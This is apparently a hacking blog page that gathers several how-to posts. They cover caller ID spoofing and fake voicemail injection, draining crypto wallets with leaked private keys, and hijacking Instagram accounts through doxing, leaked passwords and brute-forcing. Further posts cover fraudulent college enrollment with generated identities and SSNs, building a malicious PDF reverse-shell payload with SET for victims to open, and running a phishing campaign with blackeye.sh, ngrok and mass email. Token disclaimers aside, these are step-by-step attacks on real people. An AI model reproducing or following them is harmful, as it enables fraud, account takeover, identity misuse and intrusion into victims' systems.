AnonHacks

‎‎‎‎‎‎‎‎‎‎‎Hello Freaks, Anonymous here welcome to the blog 'ANONHACKS' ‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎

  • Home
  • About me
facebook Instagram Linkedin twitter


 1. Check your path on Termux by typing This Command 👇

termux-setup-storage

2. Install wget Packages for termux type This Command 👇

pkg install wget

3. Install Kali NetHunter Package for wget run This Command ðŸ‘‡

wget -O install-nethunter-termux https://offs.ec/2MceZWr

4. We need to Grant Permission to run the script in order to operate Without Permission Type ðŸ‘‡

chmod +x install-nethunter-termux

5. Run Kali Installing Script

./install-nethunter-termux

⭕️ Wait 10 Minutes Download Full Packages 1.3GB ⭕️

Wait For Download and Exterct Full Files and Folder 

♻️ don't stop download any error to not open ♻️

 download complete use next step 

6. Set NetHunter and vnc Server Password

nethunter kex passwd

 ✳️ To Start NetHunter : 

⬛️ Run Vnc Server to use This Command (Desktop user sessions)👇

Start VncServer Sessions 

nethunter kex &

Stop Vncserver Sessions 

nethunter kex stop

⬛️ Run NetHunter Termux Command Line Interface

nethunter

⬛️ Run NetHunter Root User Command Line Interface 

nethunter -r

⬛️ Set NetHunter Root Password 

nethunter -r kex passwd

⬛️ Run NetHunter Vnc Server Root User (Desktop user sessions)👇

Start VncServer Sessions 

nethunter -r kex &

Stop Vncserver Sessions 

nethunter -r kex stop

⬛️ Run NetHunter Shortcut key

open termux run this command

nh


Launch sudo apt update && sudo apt-full upgrade -y the first step after installing Kali update. If you have more storage space available you may want to use sudo apt install -y kali-linux-default again.

Subscribe to YouTube Channel 

https://youtube.com/channel/UCUhO6qymOnHOUGZM9AyQb6w

https://youtube.com/channel/UC9H8sUv8y-T6H7BMwE3bUhA


0
Share


 Spoofed phone calls originate from one source that's disguising its phone number as a different one, and you probably get these calls all the time. Maybe they're numbers from your local area code or numbers for prominent businesses, and the callers are just hijacking those numbers to fool you into picking up. Turns out, making a spoofed call is something anybody can do.

Now, caller ID spoofing isn't as illegal as you think it would be, so there's a good chance you can spoof a phone number when calling someone and not get in any trouble. Some states, like Arkansas, prohibit all spoofed calls except when used for law enforcement or public safety. Other states have no specific laws governing caller ID spoofing.

On the federal level, the FCC's Truth in Caller ID Act rules "prohibit anyone from transmitting misleading or inaccurate caller ID information with the intent to defraud, cause harm or wrongly obtain anything of value." So if you're up to no good, you might want to think twice about attempting to spoof someone else's digits.

Why Use Caller ID Spoofing?


Now that we've gotten that little warning out of the way, there are plenty of legitimate reasons why someone would want to spoof a number.

Law enforcement can spoof numbers during investigations so that they don't give themselves away. Spoofed numbers also help protect your real phone number and prevent the people you're calling from calling you back, so it acts as a sort of privacy tool to shield yourself from callbacks and harassment. Pranks are one of the more fun reasons to spoof a phone number. And those are just a few reasons.

On the flip side, there are plenty of illegitimate uses for caller ID spoofing. Spammers and robocalls use them religiously to trick you into picking up so they can defraud you or try to social engineer themselves into your accounts. Neighbor spoofing, where the caller picks a number in your local area code, is used more and more by these types of assailants.

Malicious actors can also take advantage of unprotected voicemail accounts. If a dial-in voicemail account has no PIN protection, all it takes to open and listen to the voicemails is a call from the account owner's phone number, and that can be spoofed so others can hear those recordings

An even bigger threat is using caller ID spoofing to facilitate SIM swapping fraud, where they convince the phone provider that they are you and need to port your number over to their SIM card. If successful, your number would be disconnected, and they would get all your calls and texts, which is useful when attempting to hack into accounts that use two-factor authentication, like SMS text codes.

We hope you're sticking with one of the more legitimate uses for this, of course.

Use a Phone Spoofing Service


There are actually services out there that help you pretend to be another caller, and most of them cost money to use. Some, like SpoofCard, have trial credits so you can test out the service first, and that's the one we'll be using in this guide. If you find out you like what it has to offer, credits, which are per minute, are pretty affordable.

When signing up for SpoofCard, you need to provide your real phone number, agree to their terms, and create a PIN code. Then, you'll get five free credits to test out all the tools it includes.

You can start an account and make calls from SpoofCard's website, but we'll be using its mobile app, which is easier. There's a mobile app for iOS and Android, and both are pretty much the same in terms of functionality.

Set Up a SpoofCard Account


When you first open the app, you'll see a splash screen that shows you all the tools it has to offer, including caller ID spoofing, adding background noise, changing your voice, and record calls. Recording calls is another legal concern you should look into for your state's specific laws.

Federal law says that it's OK to record someone or a group of people without their knowledge as long as you partake in the conversation. If you're not in the conversation, you need just one person from the group to permit you. In the U.S., 35 states (plus Washington, D.C.) have similar laws, but 15 states require consent from all parties involved. We're not recording calls, but just be aware of that.

Tap on "Get Free Credits" or "Sign Up" to begin the signup process. You'll need to enter your real phone number, create a four or six-digit PIN, and agree to its terms. You'll also need to enter your email address or sign in with your Apple ID (iOS only) or Facebook account.



After that's done, you may get some prompts to activate notifications or connect your contacts, and you can allow or deny those as you see fit.



All that's left to do is hit "Call." The person you're calling will see the spoofed phone number on their caller ID, perhaps even the name of the company or person associated with the number, but they'll be answering your call.

In my TripActions example, I could tell the person travel details for a trip that's coming up, and I could really screw with their schedule. But you could also just use the number to get your foot in the door to talk about whatever else you need to talk about.




Go Straight to Voicemail with Your Spoofed Number


If you don't want to have any interactions with the person you're calling, you can do the same thing as above, but before hitting "Call," tap the "Straight to Voicemail" button. Instead of charging by the minute, it only takes up one credit for a whole voicemail.

In my TripActions example again, I could inject a voicemail directly into the person's phone where they could listen to or read a transcription of whatever I say. Their phone won't ring and will act as a missed call, but the voicemail will definitely get through.

If I wanted to play an evil prank on them, I could inject a voicemail that might suggest something was wrong with their upcoming trip, such as a cancelation, security issue, or flight delay.

Other Things You Can Do


As you can see from the screenshots, there are other things you can do with SpoofCard. You can record a call (one credit), add background noise such as screams, sirens, dogs, and crowds (free), and use the voice changer to make your voice sound male or female (also free).

If your phone supports Wi-Fi calling, you might also see an option for that too.

Whenever you make a spoofed call, the person you're calling won't be able to call you back, but they will be able to call the phone number you spoofed. So keep that in mind.

You can also use the "SpoofText" tab to send text messages from a spoofed number. And the "Credits" tab will show you your credits and let you buy more. On both iPhone and Android, it's $9.99 for 45 credits, $19.99 for 100, $29.99 for 160, $49.99 for 280, or $99.99 for 600.

Just remember, whatever you end up using caller ID spoofing, check your state and local laws to make sure you're not doing any illegal or something that could get you into trouble.

Subscribe to YouTube Channel :

https://youtube.com/channel/UCUhO6qymOnHOUGZM9AyQb6w

https://youtube.com/channel/UC9H8sUv8y-T6H7BMwE3bUhA


0
Share

 

Attention! All information is provided for informational and educational purposes only. The author is not responsible for any possible harm caused by the materials of this article.

And so, straight to the point.

The essence

We will be looking for private keys from cryptocurrency wallets.

The first thing we need to do is find a site that stores a large number of private keys. The best ones in my opinion are privatekeys.pw & allprivatekeys.org . I will show on the example of privatekeys.pw .

1. Go to the site and click on Directory.



2. Select the crypto that we want to receive (I recommend looking for Ethereum keys, since there are also tokens in addition to ether)



3. Next, a table will appear in front of us where there are private keys and their addresses and balances 👇


Even if there is no balance, you can always check the address for the presence of tokens, for this we copy it.



And go to etherscan.io .




If you saw the balance of tokens, then congratulations you received free tokens.

4. To add this wallet to yourself, download MetaMask . Create a wallet and import the wallet private key with balance or tokens.





5. If the tokens were not added to the wallet, then we return to etherscan. Click on the token we want to add 👇


Copy the address of the contract.



Go to metamask and add the contract address.




Congratulations, you have received a token.





If you find a wallet with an ether balance, then we also import the private key and transfer the ether to your address.

We continue

To find the keys, I recommend downloading the electrum.org wallet . The keys themselves are best taken here — allprivatekeys.com/all-bitcoin-private-keys-list .

Choose any key 👇



Next, open Electrum and import the private key.





Congratulations, you entered the wallet, now we are waiting for someone to deposit the balance and withdraw to your wallet

Thank you all for your attention!

Subscribe to my YouTube channel 

https://youtube.com/channel/UCUhO6qymOnHOUGZM9AyQb6w

https://youtube.com/channel/UC9H8sUv8y-T6H7BMwE3bUhA



0
Share


 This method is for Hijacking OG/High Stat Instagram accounts. I’m not responsible for any accounts taken with this method.

Tools needed:

http://truepeoplesearch.com - Best Free People Look Up (not widely known)

http://pwndb2am4tzkvold.onion/ - Free Leaked Email search site via TOR

Facebook - great for looking up someone via email/phone number

https://druggy.org/files/IG-emails.txt 

or https://gofile.io/?c=jijM7w

MASSIVE list of known OG Instagram Emails and phone numbers (I do not own this)

Known knowledge of Social Engineering

Start by going to the Username list and pick out something you like (many have already been hijacked. the list is fairly old but there are still ALOT of good usernames on it)

If it’s an email, take it to Facebook and try to find an account linked to that email, if you can’t that is fine! But you’ll just be working with less work and truepeoplesearch will be worthless to you. If you manage to find an account Take the owners full name to truepeoplesearch.com and you could find more emails to that owner!

After all that head to the TOR look up site! and gather all emails found and them into the email look up and see if you find any passwords. If you find some go to the Instagram login and try out maybe you’ll get lucky! if they don’t work try some that would be similar example if you found that one of the owners passwords was apple1 try Apple1 or apple2, Apple! Apple {Birthday if you found during dox}

If it gave you a phone number put it into truepeoplesearch.com and gather your emails and put them into the TOR site!

good luck with hacking.


Subscribe to YouTube Channel :

https://youtube.com/channel/UC9H8sUv8y-T6H7BMwE3bUhA

0
Share


1 Open Terminal


2 apt update && apt ugrade -y


3 apt-get install git


{installing git to clone repo}


4 apt-get install python

{installing python }


5 apt-get install python3

{installing python3}


6 cd Desktop 

{changing directory to desktop}


7 git clone https://github.com/Pure-L0G1C/Instagram (https://github.com/Pure-L0G1C/Instagram)


{This command will clone the github repo}

OK so after completition of 7th command we need to run


8 chmod +x Instagram

after that run

cd Instagram

Now run python instagram.py -h to get the help menu

Now just simply enter this command

python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file

[wordlist file comes already by default in linux or parrot just extract rockyou in /usr/share/wordlists and replace the path ]

If the users password is in rockyou than this gonna work but if not than its your badluck but you can try other ways if you want


Subscribe to YouTube Channel :

https://youtube.com/channel/UC9H8sUv8y-T6H7BMwE3bUhA

0
Share

 


 

Several services will now allow you to buy bitcoins with your credit card (even though it is risky for sellers to offer this option). But it comes with a price and some hassle mostly connected with verification process.

 

Buy bitcoins with credit/debit card at Coinbase

Coinbase is one of the best bitcoin wallets at the moment and it allows users to purchase bitcoin by directly transferring money from a bank account this is a standard option. The exchange also supports secure credit and debit cards to purchase bitcoins instantly.

 

At this time Visa, Mastercard and Maestro cards with 3D Secure authentication support may be added to a Coinbase account. Currently 32 countries are supported, including US, Canada, European Union countries and Singapore. If you buy more than $100 worth of bitcoin through this link, you’ll get $10 of free bitcoin.

 

Buy bitcoins with credit card at Coinmama

CoinMama has a great service. Probably this is the fastest way to get your bitcoins with credit card. Verification is fast and they have good user support too (if you are already a verified customer your orders will be processed immediately). You can purchase up to $1000 worth of bitcoin daily or $5000 monthly. The only problem is, that it really comes with the price. First, the exchange rate for bitcoins is way above the daily rate on major trading platforms (about 10%), plus they will charge you an additional 10$ flat fee, which is taken from their credit card processing provider. You will get a 5% discount if you use the link above.

 

Buy bitcoins with credit card via Cex.io

Once trading and mining platform Cex.io has now a service to buy bitcoin currency via credit and debit cards they accept Visa and Mastercard currently. Please note that several steps are needed for account verification before you can actually buy bitcoins, so this is not an easy and quick process but if you are planning to buy currency more often, the hassle is worth it. Once bought, coins are immediately credited to your account! Fees for credit card deposits in USD and EUR have been lowered to 3.5% + 0.2 USD/EUR recently.

 

Buy bitcoins with credit card via VirWox

You need a free account on Virtual World Exchange. Using the VirWox you can buy Second Life Lindens (SLL) with credit card and then convert your SLL to bitcoins. The process is done through the use of PayPal or Skrill, so every credit card which PayPal/Skrill accepts is eligible to be used in this process. This process will charge you transaction fees of around 6% and no verification is needed.

 

Buy bitcoins with credit card via 24/7 Exchange

24/7 Exchange offers instant way to buy bitcoins with credit card. They do not hold your funds, they deliver bitcoins instantly after the payment and you’ll know the exact price of bitcoin before you’ll have to pay. The only problem is that the whole process of buying takes around 3 business days as they have thorough verification process. Also the website is a bit confusing from time to time.

 

Other providers

There are other providers that somehow did not make to the list above either they provide buying process in some local currency, they use some workaround through some other provider or there are other reasons why we did not include them. But they still provide buy bitcoin with credit cards service in some way, so please check them if you think they can be useful to you. Currently on the list: CleverCoin,Circle, Cubits, Indacoin and CoinCorner.


0
Share


 Go to https://www.openccca…user2=&user3=ft 

Click “Create Account” and click “Being Creating My Account”

Now go to http://www.fakenamegenerator.com/ and sign in with Google.

Go to advanced options and set the age to only 23 (23-23). Set the gender to whatever you want, and click generate.

Enter the data from the http://www.fakenamegenerator.com/ into the Account Creation on the application.

Select “I don’t have a middle name”. Also select No for Previous name and No for Preferred Name. Also select None for Suffix

Copy the birthday from the fakenamegenerator (make sure the age is correct, year 1995)

Enter the SSN from the form, but don’t include the dashes, (just the numbers)

Click Continue

Get a trash email service (You NEED access to it) and enter that email in the email and email confirmation place.

Enter the phone number from fakenamegenerator with the dashes into the first number box and check the box under it.

Leave the second phone number blank.

Go to https://www.google.c…_BBQQ8gEIiQEwDw 

Zoom in and click on a house in the red area

Click on the little box at the bottom with the street address that is shown

Enter the address shown on the left of google maps into the account creation forum

Click continue

Enter a random username, password, and pin. You won’t need to remember this info

Choose and answer security questions randomly, You dont need these.

Solve the captcha and click “Create my account”

Click continue

Click Start Application

Select a random term, and select undecided on both goal and major.

Select “My mailing address is the same as the Permanent Address in my OpenCCC Account above”

Click Continue

Select the gender of the name you used

Choose “No” for transgender and select heterosexual/straight

Select random educational levels

Select “No” for Hispanic or Latino

Only Select WHITE

Click Continue

Select First-time student in college (after leaving high school)

Select Received high school diploma from U.S. schoool

Select 21th of June, then the year before you are doing this (while im writing this, 2017)

Check Yes for both boxes

Select I attended high school, California, and Sacramento High.

Put 3.50-4.0 as GPA, and put random highest courses and grades corrolating to GPA

Select No degree and select no Colleges/Universities Attended (None)

Click Continue

Select US citizen and select No military status applies to me

Select Yes for California Residence and select no for everything else

Click continue

Select the follow answers in order: yes, no, no, no not interested. Then select random programs

Select English as primary language

Enter the phone number from fakenamegenerator as your cell phone number (without dashes)

Select 3.50 and above as GPA

Select 0 as number of college units

Select US for both options for additional citizenship info

Select random household income, random indiviuals and select none, not searching for employment 

Select no for all options

Select no for learning disabilities and yes for work experience

Choose and answer security questions (REMEMBER THESE QUESTIONS AND ANSWERS)

Click “I have reviewed this application and confirm it is complete and accurate”

Check both boxes and click Submit My Application

You should get an email saying they got your application

Wait until they accept it (usually takes about 30 mins on work hours)

You should get an email saying they accepted it

Go to https://ps.losrios.edu/ 

Click the set new password button and copy the student id in the email to the box

Paste the student ID on the form

Enter the security questions from earlier

Enter the new password of your choice

Go to https://apps.losrios.edu 

Login

Click Los Rios Gmail

You have finished the guide! You are in your email account now. Your email address is w(studentID)@Apps.losrios.edu

Happy learning!❤️

0
Share


0
Share


0
Share




HEY guys welcome to this page i will tell you very intersting thing all about payload but nowdays pepole are very smart they don't click any server or install any apk but we are hackers we have found solution of it that is meterpeter payload it works like payload it's  a virus but victim doesn't open it now if we send victim a pdf file it will open bcoz that is not an exe file not only pdf file image word file ppt file .mp4 and more extension our victim will open it he will see see that file but in background the virus will run and get hacked i hope our Members will subscribe to our YouTube channel(https://youtube.com/channel/UC9H8sUv8y-T6H7BMwE3bUhA),Then I will make a video tutorial on this. ok, so now  let's get into the topic.what is advance meterpeter payload ok, here is the steps <


▪️1- open kali linux


▪️2- go to tools social enginering and select set tool wait it till then it open


▪️3- Now a menu will appear type 1 and press enter


▪️4- Agian many options will come select 3 enter


▪️5- Now agian will two option come just selct option 1 and press enter named file format exploits


▪️6- Give your reverse ip connection if you are doing in internet just simply use no-ip 


▪️7-  Now many options are visible select your format you want to i will use 13 for pdf use as your wish


▪️8- Now it will ask that you want your pdf to bind virus or a blank pdf it depends on your wish i select blank pdf by pressing 2 button and press enter


▪️9- No some confusing options will come just select any depends on your situation


▪️10- Now enter your lhost for listing the payload type and enter


▪️11- Now enter your port and press enter make sure the port is open


▪️12- Press enter it will take some time and genrate


▪️13-Now it will ask for listen port type yes and enter


▪️14-  It wil take some time just wait you will get your exploit 


▪️15- Done send your victim and make sure to convince them to download 


YouTube Channel Link : https://youtube.com/channel/UC9H8sUv8y-T6H7BMwE3bUhA

0
Share


 Phishing tutorial 2021 - For any Linux OS


 Join Now : - ANONHACKS

|````````````````````````````````````````````````````````````````````````````````````````````````|

| First, download the free phishing tool by typing this command in the terminal - |

| |

| wget https://raw.githubusercontent.com/katerin966/tools/main/blackeye.sh |

| |

| Then, sudo bash blackeye.sh |

|________________________________________________________________________________________________|

 

Steps--

 Join Now : - ANONHACKS 

1. First you need to make one email for testing(receiving) the phishing email.

 

2.(install SMTP server)Open your terminal and type sudo apt update && sudo apt upgrade && sudo apt install postfix && sudo apt install bsd-mailx

 

3.Get SET.A tool which can be used for many types of social engineering attacks,but here we will use it to send the mass email

 

git clone https://github.com/trustedsec/social-engineer-toolkit.git

 

4.Now type sudo service postfix start.Then type telnet kali.kali 25.The kali.kali is your machine name so type the name of your machine.

 

5.Open SET folder and open new terminal there.Type sudo python3 setoolkit and your SET will start,then go to social engineering attacks,choose mass email,then choose the second option which is own smtp server and then just follow the instructions of the tool and stop before you send the email to your testing email.You need a phishing page did you forgot about that?! So let’s learn how to get the fastest method to get phishing pages.

 Join Now : - ANONHACKS



6.In terminal again type wget https://raw.githubusercontent.com/katerin966/tools/main/blackeye.sh (skip this if you already done this command). Now go to https://ngrok.com/ and register.This is a tunnel app which generates links to your phishing page.After register download the app to your blackeye.sh tool paste it and configure it with the token you have from you account.Then you need to open terminal in the folder and type sudo ./ngrok http 80 to start your ngrok server.After that open new terminal in the same folder and type sudo ./blackeye.sh (or sudo bash blackeye.sh)and you will see the menu of the sites that the tool have already cloned and ready for use.Just choose one for example instagram and copy the link of your ngrok window.

 Join Now : - ANONHACKS

7.This is the last step.Go back to SET and in the email paste the link and you can send it to your testing email.You can also input the link in and html file button for example to be more stealthy.Now open the email click the link and you will be redirected to a fake page,input your credentials and you will receive them in the blackeye.sh windows.It shows even country,ISP,city,currency.

 

That’s all for the phishing spamming emails.We learned how they work and how to protect from these attacks.

 



Join Now : - ANONHACKS 

Hope you liked this topic.If you have questions or want to learn more I provide private lessons and courses.

0
Share
Newer Posts Older Posts Home

Follow On

  • facebook
  • instagram
  • Telegram

Search This Blog

  • February 2022 (1)
  • January 2022 (2)
  • June 2021 (2)
  • May 2021 (5)
  • April 2021 (11)
  • March 2021 (6)
  • February 2021 (4)
  • January 2021 (4)
  • December 2020 (2)
  • August 2020 (17)

Hidden WIKI

Search results

Translate

About Me

My photo
Admin
View my complete profile

Top 10 Reasons Why Python is So Popular and Why You Should Learn Python

  Every decade brings a new programming language that sweeps developers off their feet. One of the most popular and in-demand programming la...

Link List

  • instagram
  • Telegram

Popular Posts

  • ⚜What is an ORM?
     ⚜What is an ORM?  🛡ORM stands for Object Relational Mapper. It allows you to create and manage your databases easily using models. 🔱A typ...
  • Hack WhatsApp By Sending a Link
     INTRODUCTION WhatsApp has become an important part of billions of people’s life. Many of us woke up or go to bed, by checking our WhatsApp ...
  • Hack Whatsapp account by mac spoofing in 7steps
    MAC - It stands for Media Access Control and it is an identification number assigned to the Wi-Fi and network adapter.   A good thing is the...
Copyright © 2019 AnonHacks

Created By Anonymous Shared By Ramkishore